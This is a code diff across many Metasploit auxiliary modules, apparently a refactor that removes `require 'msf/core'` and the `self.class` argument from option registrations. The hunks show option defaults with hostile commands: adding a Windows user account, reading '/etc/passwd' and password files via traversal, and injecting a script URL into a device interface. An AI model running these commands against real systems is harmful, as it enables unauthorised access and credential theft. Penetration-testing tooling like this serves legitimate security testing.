class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::SNMPClient
@ -46,7 +44,7 @@ class MetasploitModule < Msf::Auxiliary
register_options([
OptEnum.new('ASAVER', [ false, 'Target ASA version (default autodetect)', 'auto', ['auto']+@offsets.keys]),
], self.class)
])
deregister_options("VERSION")
datastore['VERSION'] = '2c' # SNMP v. 2c required it seems


@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
@ -40,7 +38,7 @@ class MetasploitModule < Msf::Auxiliary
OptString.new('USERNAME', [true, 'Username to use', '']),
OptString.new('PASSWORD', [true, 'Password to use', '']),
OptBool.new('SSL', [true, 'Use SSL', true])
], self.class)
])
end
def run_host(ip)


@ -4,8 +4,6 @@
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
@ -36,7 +34,7 @@ class MetasploitModule < Msf::Auxiliary
register_options(
[
Opt::RPORT(21),
], self.class)
])
end
def run


@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::SMB::Client
@ -33,7 +31,7 @@ class MetasploitModule < Msf::Auxiliary
OptString.new('CMD', [ true, 'The command to execute', 'ver']),
OptString.new('SMBUser', [ true, 'The username to authenticate as', 'db2admin']),
OptString.new('SMBPass', [ true, 'The password for the specified username', 'db2admin'])
], self.class )
])
end
def run


@ -4,8 +4,6 @@
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
@ -31,7 +29,7 @@ class MetasploitModule < Msf::Auxiliary
register_options([
Opt::RPORT(8030),
OptBool.new('SSL', [true, 'Use SSL', true])
], self.class)
])
end
def run


@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
@ -104,7 +102,7 @@ class MetasploitModule < Msf::Auxiliary
[
Opt::RPORT(8028),
OptString.new("PARAM", [false, 'Specify a parameter for the action'])
], self.class)
])
end
def run


@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
@ -32,7 +30,7 @@ class MetasploitModule < Msf::Auxiliary
[
Opt::RPORT(3000),
OptString.new('CMD', [ false, 'The OS command to execute', 'hostname']),
], self.class)
])
end
def run


@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
@ -32,7 +30,7 @@ class MetasploitModule < Msf::Auxiliary
[
Opt::RPORT(3500),
OptString.new('CMD', [ false, 'The OS command to execute', 'echo metasploit > metasploit.txt']),
], self.class)
])
end
def run


@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient


@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
@ -50,7 +48,7 @@ class MetasploitModule < Msf::Auxiliary
[
Opt::RPORT(5555),
OptString.new("CMD", [true, 'File to execute', 'Windows\System32\calc.exe'])
], self.class)
])
end


@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
@ -42,7 +40,7 @@ class MetasploitModule < Msf::Auxiliary
Opt::RPORT(8080),
OptString.new('USERNAME', [true, 'Username for the new account', 'msf']),
OptString.new('PASSWORD', [true, 'Password for the new account', 'p4ssw0rd'])
], self.class)
])
end
def get_service_desk_strong_name


@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report


@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer::HTML
@ -87,7 +85,7 @@ class MetasploitModule < Msf::Auxiliary
"A URL to inject into a script tag in the context of the device web interface.",
''
])
], self.class)
])
end
def run


@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
@ -47,7 +45,7 @@ class MetasploitModule < Msf::Auxiliary
OptString.new('USERNAME', [ true, 'The user to authenticate as', 'admin' ]),
OptString.new('PASSWORD', [ true, 'The password to authenticate with' ]),
OptString.new('PATH', [ true, 'The file to read or delete', "\\windows\\win.ini" ])
], self.class)
])
end
def run


@ -3,7 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'bcrypt'
require 'digest'
require 'openssl'


@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
@ -30,7 +28,7 @@ class MetasploitModule < Msf::Auxiliary
[
OptString.new('FILE', [ true, 'The file to traverse for', '/etc/passwd']),
OptString.new('URL', [ true, 'The path to mimencode', '/cgi-bin/ck/mimencode']),
], self.class)
])
end
def run_host(ip)


@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
@ -37,7 +35,7 @@ class MetasploitModule < Msf::Auxiliary
[
Opt::RPORT(80),
OptString.new('CMD', [ true, 'The command to execute', 'cat var/passwd'])
], self.class)
])
end
def run


@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient


@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient


@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient


@ -4,8 +4,6 @@
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
@ -37,7 +35,7 @@ class MetasploitModule < Msf::Auxiliary
[
Opt::RPORT(8000),
OptString.new('CMD', [ false, "The command to execute.", "net user metasploit password /add" ]),
], self.class)
])
end
def run


@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
@ -36,7 +34,7 @@ class MetasploitModule < Msf::Auxiliary
register_options(
[
OptString.new("TARGETURI", [true, 'The URI directory where basic auth is enabled', '/'])
], self.class)
])
end


@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
@ -41,7 +39,7 @@ class MetasploitModule < Msf::Auxiliary
[
OptString.new('TARGETURI', [ true, "The request URI", '/']),
OptString.new('PASSWORD', [true, 'The password to set', 'pass'])
], self.class)
])
end
def check


@ -4,8 +4,6 @@
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
@ -30,7 +28,7 @@ class MetasploitModule < Msf::Auxiliary
register_options(
[
OptInt.new('SID_MAX', [true, 'Maximum Session ID', 100])
], self.class)
])
end
def run
